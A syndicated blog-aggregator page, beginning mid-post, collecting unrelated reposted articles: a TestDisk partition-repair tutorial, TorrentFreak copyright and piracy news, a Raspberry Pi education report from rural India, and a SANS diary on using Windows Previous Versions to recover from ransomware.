Although this entire encounter with Getty Images took less than two weeks, I was preparing for a long battle. I even contacted the Electronic Freedom Foundation (EFF) to see if they could assist. The day after Getty recanted, I received a reply from the EFF: no less than four attorneys wanted to help me. (Thank you, EFF!)

I strongly believe that Getty Images is using a “cookie cutter” style of complaint and is not actually interested in any lawsuit; they just want to extort money from people who don’t know their rights or don’t have the fortitude for a long defense (SLAPP). Getty Images made no effort to evaluate the content beyond an automated search bot, made no attempt to review the bot’s results, provided no evidence that they are the copyright holder, provided no proof that they tried to verify licenses, and threatened legal action against me if I did not pay up.

I am glad that I stood up for my First Amendment rights.

Linux How-Tos and Linux Tutorials: How to Fix a Mangled Partition Table on Linux

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Carla Schroder. Original post: at Linux How-Tos and Linux Tutorials

fig-1 boot failureWell there I was, rebuilding a router and having a good time when I accidentally damaged the partition table on my main Linux installation, which is a GUID partition table, or GPT. Figure 1 (above) shows the cheery message that greeted me at boot.

How did this happen? I was installing Voyage Linux on a compact flash card, and while I was messing around with GParted and other filesystem tools I accidentally ran some commands on/dev/sdb, my main hard disk, instead of /dev/sdc, the compact flash card. Like, oops. I don’t know exactly which operations gummed up /dev/sdb, which would be good to know. But I don’t, so let us carry on.

“Press any key to exit” landed at a blinking cursor on a black screen. Fortunately, I always foil the desires of certain distros that disable ctrl+alt+delete, or make it behave like Windows and open a services manager. I make sure that it is enabled and that it reboots the system. I booted into a different Linux installation and pondered how to make repairs. When your partition table is damaged to the point that your Linux will not boot, you have to fix it from the outside of the damaged system via bootable rescue media, or another Linux in a multi-boot installation. SystemRescueCD on a USB stick is my fave. Any *buntu live system also makes a great rescue distro, especially on a USB stick with persistent storage, because then it remembers your settings, you can install apps, and store documents.

There are no guarantees- you may be able to repair the problem, or you may have to reinstall your operating system. If the partition table is unrecoverable you may not be able to recover your data. So, as always, your first and best line of defense is good backups.

TestDisk

A good tool for repairing partition tables and recovering files is TestDisk. TestDisk operates on both the legacy MBR and the newfangled GPT (see Using the New GUID Partition Table in Linux (Goodbye Ancient MBR)) . TestDisk is in most Linux repos, and on SystemRescueCD. Start it up as root:

$ sudo testdisk
TestDisk 6.14, Data Recovery Utility, July 2013
Christophe GRENIER grenier@cgsecurity.org;
http://www.cgsecurity.org
TestDisk is free data recovery software designed to help recover lost
partitions and/or make non-booting disks bootable again when these symptoms
are caused by faulty software, certain types of viruses or human error.
It can also be used to repair some filesystem errors.
Information gathered during TestDisk use can be recorded for later
review. If you choose to create the text file, testdisk.log , it
will contain TestDisk options, technical information and various
outputs; including any folder/file names TestDisk was used to find and
list onscreen.
Use arrow keys to select, then press Enter key:
>[ Create ] Create a new log file
 [ Append ] Append information to log file
 [ No Log ] Don't record anything

Select “create a new log file”. In the next screen select the disk you want to repair.



Select a media (use Arrow keys, then press Enter):
 Disk /dev/sda - 2000 GB / 1863 GiB - ST2000DM001-1CH164
>Disk /dev/sdb - 640 GB / 596 GiB - WDC WD6401AALS-00J7B1
 Disk /dev/sdc - 32 GB / 29 GiB - SanDisk CF  Extreme USB2
 Disk /dev/sr0 - 366 MB / 349 MiB (RO) - ATAPI   iHAS424   B
 
>[Proceed ]  [  Quit  ]
 

This example shows two hard drives, a compact flash drive, and an audio CD. /dev/sdb is the broken one. In the next screen we select the partition type:

Disk /dev/sdb - 640 GB / 596 GiB - WDC WD6401AALS-00J7B1
Please select the partition table type, press Enter when done.
 [Intel  ] Intel/PC partition
>[EFI GPT] EFI GPT partition map (Mac i386, some x86_64...)
 [Humax  ] Humax partition table
 [Mac    ] Apple partition map
 [None   ] Non partitioned media
 [Sun    ] Sun Solaris partition
 [XBox   ] XBox partition
 [Return ] Return to disk selection
Hint: EFI GPT partition table type has been detected.

In the next screen, select Analyse:

Disk /dev/sdb - 640 GB / 596 GiB - WDC WD6401AALS-00J7B1
     CHS 77825 255 63 - sector size=512
>[ Analyse  ] Analyse current partition structure and search for lost partitions
 [ Advanced ] Filesystem Utils
 [ Geometry ] Change disk geometry
 [ Options  ] Modify options
 [ Quit     ] Return to disk selection

Hmm. This does not look good. Select Quick Search:

 TestDisk 6.14, Data Recovery Utility, July 2013
Christophe GRENIER grenier@cgsecurity.org;
http://www.cgsecurity.org

Disk /dev/sdb - 640 GB / 596 GiB - CHS 77825 255 63 Current partition structure: Partition Start End Size in sectors Bad GPT partition, invalid signature. Trying alternate GPT Bad GPT partition, invalid signature. P=Primary D=Deleted >[Quick Search] Try to locate partition

This can take a little time, so be patient. And hopefully TestDisk will find your partitions:

TestDisk 6.14, Data Recovery Utility, July 2013
Christophe GRENIER grenier@cgsecurity.org;
http://www.cgsecurity.org

Disk /dev/sdb - 640 GB / 596 GiB - CHS 77825 255 63 Partition Start End Size in sectors > MS Data 63 89470974 89470912 MS Data 80078846 265625597 185546752 [xubunthome] P MS Data 265625600 1250263039 984637440 [data-xubuntu] Structure: Ok. Use Up/Down Arrow keys to select partition. Use Left/Right Arrow keys to CHANGE partition characteristics: P=Primary D=Deleted Keys A: add partition, L: load backup, T: change type, P: list files, Enter: to continue ext4 blocksize=4096 Large file Sparse superblock, 45 GB / 42 GiB

Hurrah, this is looking hopeful. If it doesn’t find your swap partition, or gives you a message that it won’t restore it, don’t worry about it because a swap partition doesn’t hold data and you can easily restore it later. At this point you have the option to select a partition and press P to see your files, and copy them to another storage medium like a different hard drive or a USB stick. Don’t copy them back to the same device, because if your recovery fails your copied files go with it. It did a funny thing on my system: no matter which directory I chose to copy files into, they all went into /home/carla/carla. I couldn’t find out if this is the correct behavior, but I got my files back.

When TestDisk finds a partition that it can restore, it is marked in the left column with a P, and highlighted in green. In the above example that is only the third partition. Press the return key, and then you can try writing the partition to disk, or doing a deeper search for more recoverable partitions. The deeper search can take a long time, even several hours on a big hard disk.

TestDisk 6.14, Data Recovery Utility, July 2013
Christophe GRENIER grenier@cgsecurity.org;
http://www.cgsecurity.org

Disk /dev/sdb - 640 GB / 596 GiB - CHS 77825 255 63 Partition Start End Size in sectors 1 * Linux 16534 109 24 77825 70 5 984637440 [data-xubuntu] [ Quit ] >[Deeper Search] [ Write ] Try to find more partitions

Then you can select writing the recovered partitions to disk:

TestDisk 6.14, Data Recovery Utility, July 2013
Christophe GRENIER grenier@cgsecurity.org;
http://www.cgsecurity.org
Write partition table, confirm ? (Y/N)
TestDisk 6.14, Data Recovery Utility, July 2013 Christophe GRENIER grenier@cgsecurity.org; http://www.cgsecurity.org You will have to reboot for the change to take effect. >[Ok]

Several things could happen: You could get a complete restoration with all of your partitions and files. You could get a partial recovery that you can mount from another system and retrieve your files. Or it could all go to that great bitbucket in the sky. Most likely you will get at least some of your files back even if you can’t restore your partition table, because stuff that is written to disk is amazingly persistent.

Please visit CGsecurity.org to learn more about TestDisk, and also PhotoRec, an excellent data recovery tool.

TorrentFreak: University Sets Fines & Worse For Pirating Students

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

lsuAnyone providing an Internet-access infrastructure to third parties needs to be aware of the online piracy issue. For service providers, whether that’s a regular ISP, web host, or the operator of a free open WiFi in a local coffee shop, knowledge of how other people’s actions can affect them is a useful asset.

For universities in the United States, awareness of how Internet piracy can affect their establishment is especially crucial. On top of the requirements of the DMCA, in July 2010, exactly four years ago, the U.S. put in place a new requirement for colleges and universities to curtail illegal file-sharing on their networks. Failure to do so can result in the loss of federal funding so needless to say, campuses view the issue seriously.

Yesterday the The Daily Reveille, the official news resource of the Louisiana State University, revealed that LSU’s IT Services receive between 15 and 20 complaints a month from copyright holders, an excellent result for around 30,000 students.

At the start of the last decade it was music companies doing most of the complaining, but Security and policy officer Craig Callender says that with the advent of services such as Spotify being made available, reports from TV companies are more common.

But no matter where they originate, LSU acts on these allegations of infringement. A first complaint sees a student kicked offline, with Internet access only restored after the completion of an educational course covering illegal file-sharing.

Those who breach the rules again have worse to look forward to, starting with a fine.

“LSU is effectively combating unauthorized distribution of copyrighted material by fining students implicated in a verified DMCA copyright violation,” the university’s official policy document reads.

“The $50 fine provides a mechanism for recovering costs incurred in reviewing and processing DMCA notifications, and funding programs for awareness (e.g., education and ad campaign costs).”

Educational campaigns include the promotion of legal services, such as those outlined on the university’s chosen official resource list. Interestingly, while the links for music and books work, the MPAA page for legal TV shows and movies (for which the university receives the most notices) no longer exists.

But while the $50 fine might be harsh enough for a student on a limited budget, LSU warns of even tougher sanctions. Allegations of illegal file-sharing are noted on the student’s academic record which can have implications for his or her career prospects.

In addition, complaints can result in a referral to the Dean of Students’ office for violation of the LSU Code of Student Conduct. According to official documentation, the Student Conduct Office keeps Student Conduct files for seven years after the date of the incident, or longer if deemed necessary.

It’s clear that the work of the RIAA and MPAA in the last decade seriously unnerved universities who have been forced to implement strict measures to curtail unauthorized sharing. LSU says it employs filtering technology to eliminate most P2P traffic but it’s clear that some users are getting through.

Almost certainly others will be using VPN-like solutions to evade not only the P2P ban, but also potential complaints. Still, universities will probably care much less about these users, since they don’t generate DMCA notices and have no impact on their ability to receive federal funding.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Online Store Can Sell ‘Used’ Ebooks, Court Rules

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

tomskabinetPeople who buy an MP3, digital movie or an eBook assume that they have the right to do whatever they want with it, but copyright holders see things differently.

Platforms that allow people to resell digital goods are meeting fierce resistance from the entertainment industries, who view them as a threat to their online business models.

For example, the major record labels previously pointed out that MP3s are simply too good to resell, as they don’t deteriorate in quality. Similarly, movie studios complained that the ability to sell “used” videos would kill innovation.

The book industry is also concerned and in an attempt to counter this threat several publishers launched a lawsuit against Tom Kabinet, an online marketplace for used eBooks based in the Netherlands.

The publishers fear that the site will negatively impact their business, and that it can’t prevent people from reselling pirated copies. The companies asked the Amsterdam Court for a preliminary injunction against Tom Kabinet, but the request was denied this week.

The Amsterdam Court concluded that selling used eBooks is a legal grey area and not by definition illegal in Europe.

Previously the EU Court of Justice previously ruled that consumers are free to resell games and software, even when there’s no physical copy. That case applied to licensed content, which is different from the Tom Kabinet case, so further investigation is needed to arrive at a final verdict.

The court therefore dismissed the publishers’ claims and ordered them to pay €23.469,56 in legal fees. Tom Kabinet, meanwhile, is still allowed to facilitate the sale of used eBooks.

It’s clear that the publishers didn’t get the result they hoped for. In fact, things have gotten worse, as Tom Kabinet’s visitor numbers have exploded. Shortly after the verdict was announced the site went offline because it couldn’t handle the surge in traffic.

These connectivity issues have been fixed now, and the site’s owner is happy with the outcome thus far.

“There is still a long way to go before legislation is clear on eBooks, but we’ve made a pretty good start,” Tom Kabinet informed TorrentFreak.

The publishers on the other hand are considering further steps, and it’s likely that the case will head to a full trial in the future.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Pirate Bay Launches Mobile Site, Teases More Expansions

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

pirate bayOne of The Pirate Bay’s strengths has been its resilience. No matter how hard the movie and music industries try, the site remains operational.

Over the years the Pirate Bay site has undergone many changes to make it harder to shut down. The tracker was put into retirement, torrents were traded in for magnet links, and the site moved its servers to the cloud.

What remained the same, however, was the site’s general appearance and its lack of support for mobile devices. That changes today.

The Pirate Bay has just debuted a new site for mobile devices. The Mobile Bay offers a much more usable interface to browse the torrent site on mobile devices.

Previously mobile users were simply presented with a smaller version of the regular Pirate Bay site, which was coded long before smartphones and tablets became popular. With banners on both sides it was rather hard to navigate on smaller devices.

The mobile version doesn’t change the overall appearance much, but it’s definitely more readable and easier to navigate.

The new vs. old mobile look
tpb-mob-oldnew

Users on mobile devices are now redirected to the new Mobile Bay domain, which will exist next to the regular site. People have the option to continue using the old layout if they prefer, but The Pirate Bay team doesn’t see any reason why people would.

“The normal version of the site renders like crap on mobile devices,” the TPB team told us.

The Mobile Bay is one of the largest visible updates to the site in years, but according to The Pirate Bay it’s only the beginning. Behind the scenes the TPB team is working on a series of new niche sites that will provide extra features and make it easier to find content.

The TV, movie and music sections on The Pirate Bay will each get their own dedicated sites. The TV site, for example, will allow users to see a complete overview of all episodes per show, download season packs, and more.

Another new project in the pipeline is the RSSbay which will support personalized RSS feeds enabling people to launch torrents remotely.

“We will add more features later on, such as personal RSS feeds so users can browse torrents at work or school, and start the downloads at home,” the TPB team tells us.

Aside from improving the user experience, the other advantage of these separate domain names is that TPB can’t be taken out as easily.

“We’re trying to separate the site into different domain names to make it more resilient. In the event one domain get taken down, there will be plenty others left,” the TPB team says.

As always with the Pirate Bay, it will be hard to predict how long it will take before these new sites will see the light of day, but the mobile edition is live now.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Director Wants His Film on The Pirate Bay, Pirates Deliver…

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

suzyDutch movie director Martin Koolhoven sent out an unusual request on Twitter a few days ago.

While many filmmakers fear The Pirate Bay, Koolhoven asked his followers to upload a copy of his 1999 film “Suzy Q” to the site.

“Can someone just upload Suzy Q to The Pirate Bay?” Koolhoven asked.

The director doesn’t own all copyrights to the movie himself, but grew frustrated by the fact that his film is not available through legal channels.

The TV-film, which also features the film debut of Game of Thrones actress Carice Van Houten, was paid for with public money but after the music rights expired nobody was able to see it anymore.

The main problem is with the film’s music, which includes tracks from popular artists such as The Rolling Stones and Jimi Hendrix. This prevented the film from being released in movie theaters and on DVD, and the TV-network also chose not to extend the licenses for the TV rights.

Since the music was no longer licensed it couldn’t be shown anymore, not even on the websites of the public broadcasters.

“To me, it felt like the movie had died,” Koolhoven tells TorrentFreak.

Hoping to bring it back to life, Koolhoven tweeted his upload request, and it didn’t take long before the pirates delivered. Within a few hours the first copy of the film was uploaded, and several more were added in the days that followed.

“I had no idea the media would pick it up the way they did. That generated more media attention. At first I hesitated because I didn’t want to become the poster boy for the download-movement. All I wanted was for people to be able to see my film,” Koolhoven says.

Unfortunately the first upload of the movie that appeared on The Pirate Bay was in very bad quality. So the director decided to go all the way and upload a better version to YouTube himself.

“I figured it would probably be thrown off after a few days, due to the music rights issue, but at least people could see a half decent version instead of watching the horrible copy that was available on The Pirate Bay,” Koolhoven tells us.

Interestingly, YouTube didn’t remove the film but asked the director whether he had the right to use the songs. Since this is not the case the money made through the advertisements on YouTube will go to the proper rightsholders.

“We’re a few days later now and the movie is still on YouTube. And people have started to put higher quality torrents of Suzy Q on Pirate Bay. Even 720p can be found, I’ve heard,” Koolhoven notes.

While the director is not the exclusive rightsholder, he does see himself as the moral owner of the title. Also, he isn’t shying away from encouraging others to download and share the film.

In essence, he believes that all movies should be available online, as long as it’s commercially viable. It shouldn’t hurt movie theater attendance either, as that remains the main source of income for most films and the best viewing experience.

“I know not everybody cares about that, but I do. The cinema is the best place to see movies. If you haven’t seen ‘Once Upon a Time in the West’ on the big screen, you just haven’t seen it,” Koolhoven says.

In the case of Suzy Q, however, people are free to grab a pirated copy.

“Everyone can go to The Pirate Bay and grab a copy. People are actually not supposed to, but they have my permission to download Susy Q,” Koolhoven said in an interview with Geenstijl.

“If other people download the movie and help with seeding then the download time will be even more reasonable,” Koolhoven adds.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Linux How-Tos and Linux Tutorials: Share a Directory Quickly on Ubuntu Using Boa Webserver

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Muktware. Original post: at Linux How-Tos and Linux Tutorials

When it comes to HTTP servers, there are many options to choose from. Apache and Nginx are two of the most well known names. Boa is a lesser known lightweight (only ~300 KB) webserver that delivers good performance. Unlike traditional webservers it doesn’t create a new fork for each connection, or, in other words, it is a single-tasking HTTP server. It has a light memory footprint and makes it suitable for running on embedded devices. Configuring Boa is also easy.

Boa runs on desktops, too. Let’s say you want to share a directory from your Ubuntu system with your colleague in a remote branch with a Microsoft Windows system but on the same office network. The files are bigger than your email attachment limit and your colleague needs to choose several files from the directory as per his needs. Boa can be a handy choice in situations like this where you would like to share a directory quickly over HTTP. Of course you can choose other options like Apache but Boa merely takes a minute to install, setup and share any directory over HTTP. This guide will show you how to do that on Ubuntu.

Read more at Muktware

Raspberry Pi: Exploring computing education in rural schools in India

This post was syndicated from: Raspberry Pi and was written by: Helen Lynn. Original post: at Raspberry Pi

Earlier this year, the Raspberry Pi Foundation supported a University of Cambridge team of two researchers, Dr Maximilian Bock and Aftab Jalia, in a pilot project exploring the possibilities of providing computing access and education in rural schools in India. Working with local organisations and using an adaptable three-day programme, they led two workshops in June 2014 introducing students and teachers to computing with the Raspberry Pi. The workshops used specially designed electronics kits, including Raspberry Pis and peripherals, that were handed over to the partner organisations.

Karigarshala students connect Raspberry Pis and peripherals The first workshop took place at Karigarshala Artisan School, run by Hunnarshala Foundation in Bhuj, Gujarat; the attendees were a group of 15-to-19-year old students who had left conventional education, as well as three local instructors. The students started off with very little experience with computers and most had never typed on a keyboard, so a session introducing the keyboard was included, followed by sessions on programming, using the Raspberry Pi camera module and working with electronics.

Karigarshala students mastering hardware control of an LED via the Raspberry Pi GPIO

Karigarshala students mastering hardware control of an LED via the Raspberry Pi GPIO

Students chose to spend their evenings revisiting what they had learned during the day, and by the end of the course all the students could write programs to draw shapes, create digital documents, connect electronic circuits, and control components such as LEDs using the Raspberry Pi.

Chamoli students practise on their own using a TV as a monitor

Chamoli students practise on their own using a TV as a monitor

The second workshop welcomed six- to twelve-year-old pupils of the Langasu Primary School in the remote Chamoli district, Uttarakhand, along with three of their teachers. This younger group of students followed a programme with more focus on activities featuring immediate feedback — for example, Sonic Pi for live-coding music — alongside programming and electronics tasks. As they learned, students soon began teaching other students.

In an Ideas Competition held at the end of the workshop, entries reflected students’ engagement with the Raspberry Pi as a device with which to build solutions: an inverter system to deal with frequent power outages, a weather station that gives warnings, a robot to assist with menial chores.

Weather station/forecaster
Battery-operated inverter
Pi-controlled chores robot

The Cambridge team’s “Frugal Engineering” approach, delivering computing education without the need for elaborate infrastructure, proved very successful in both schools. Hunnarshala Foundation has decided to integrate the Raspberry Pi into its vocational training curriculum, while students at Langasu Primary School will not only carry on learning with Raspberry Pis at school but will be able to borrow self-contained Raspberry Pi Loan Kits to use at home. The Cambridge team remains in touch with the schools and continues to provide off-site support.

September 2014 and February 2015 will see the team build on this successful pilot with induction workshops in three new schools, as well as follow-up visits to evaluate the use of Raspberry Pi in past project sites and to provide support and resources for expanding the programmes.

SANS Internet Storm Center, InfoCON: green: Windows Previous Versions against ransomware, (Thu, Jul 24th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

One of the cool features that Microsoft actually added in Windows Vista is the ability to recover previous versions of files and folders. This is part of the VSS (Volume Shadow Copy Service) which allows automatic creation of backup copies on the system. Most users “virtually meet� this service when they are installing new software, when a restore point is created that allows a user to easily revert the operating system back to the original state, if something goes wrong.

However, the “Previous Versions� feature can be very handy when other mistakes or incidents happen as well. For example, if a user deleted a file in a folder, and the “Previous Version� feature is active, it is very easy to restore a deleted file by clicking the appropriate button in the Properties menu of the drive/folder that contained the deleted file. The user can then simply browse through previous versions and restore the deleted file, as shown in the figure below:

Previous Versions tab

You can see in the figure above that there are actually multiple versions of the Desktop folder that were saved by the “Previous Versions� feature. A user can now simply click on any version he/she desires and browse through previous files.

How can this help against Cryptolocker and similar ransomware? Well simply – when such ransomware infects a machine, it typically encrypts all document files such as Word and PDF files or pictures (JPG, PNG …). If the “Previous Versions� feature is running, depending on several factors such as allocated disk space for it as well as the time of last snapshot (since “Previous Versions� saves files comparing to the last snapshot, which would normally take place every day), you just might be lucky enough that *some* of the encrypted files are available in “Previous Versions�.

Monitoring “Previous Versions� activities

As we can see, by using this feature it is very simple to restore previous files. This is one of the reasons why I see many companies using this feature on shared disks – it can be very handy in case a user accidentally deleted a file.

However, there are also security implications here. For example, a user can restore a file that was previously deleted and that you thought is gone. Of course, the user still needs access rights on that file – if the ACL does not allow him to access the file he won’t be able to restore it, but in case an administrator set ACL’s on a directory, which is typically the case, and everything else below it is inherited, the user might potentially be able to access a file that was thought to be deleted.

This cannot be prevented (except by changing ACL’s, of course), so all we can do in this case is to try to monitor file restoration activities. Unfortunately, Windows is pretty (very?) limited in this. The best you can do is to enable Object Access Audit to see file accesses and then see what a particular user accessed. That being said, I have not been able to stably reproduce logs that could tell me exactly what version the user accessed – in some cases Windows created a log such as the following:

Share Information:
                Share Name:                    \\*\TEST
                Share Path:                    \??\C:\TEST
                Relative Target Name:          @GMT-2014.07.02-11.56.38\eula.1028.txt

This is event 5145 (“A network share object was checked to see whether client can be granted desired access�), and it is visible which copy was accessed but, as I said, I was not able to have this event generated by this constantly.

Conclusion

The “Previous Versions� feature is very handy in cases when you need to restore a file that was accidentally deleted or modified and can sometimes even help when a bigger incident such as a ransomware infection happened. Make sure that you use this feature if you need it, but also be aware of security implications – such as the fact that it automatically preserves deleted files and their modified copies.

Finally, for some reason Microsoft decided to remove, actually modify this feature in Windows 8. The “Previous Versions� tab does not any more exist in Explorer (actually it does, but you need to access files over a network share). For saving local files Windows 8 now use a feature called “File History�. It needs to be manually setup and it needs to have an external HDD which will be used to save copies of files. This is definitely better since, if your main HDD dies, you can restore files off the external one, but keep in mind that it needs to be setup manually. Finally, if you use EFS to encrypt files, the “File History� feature will not work on them.


Bojan
​bojanz on Twitter

INFIGO IS

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.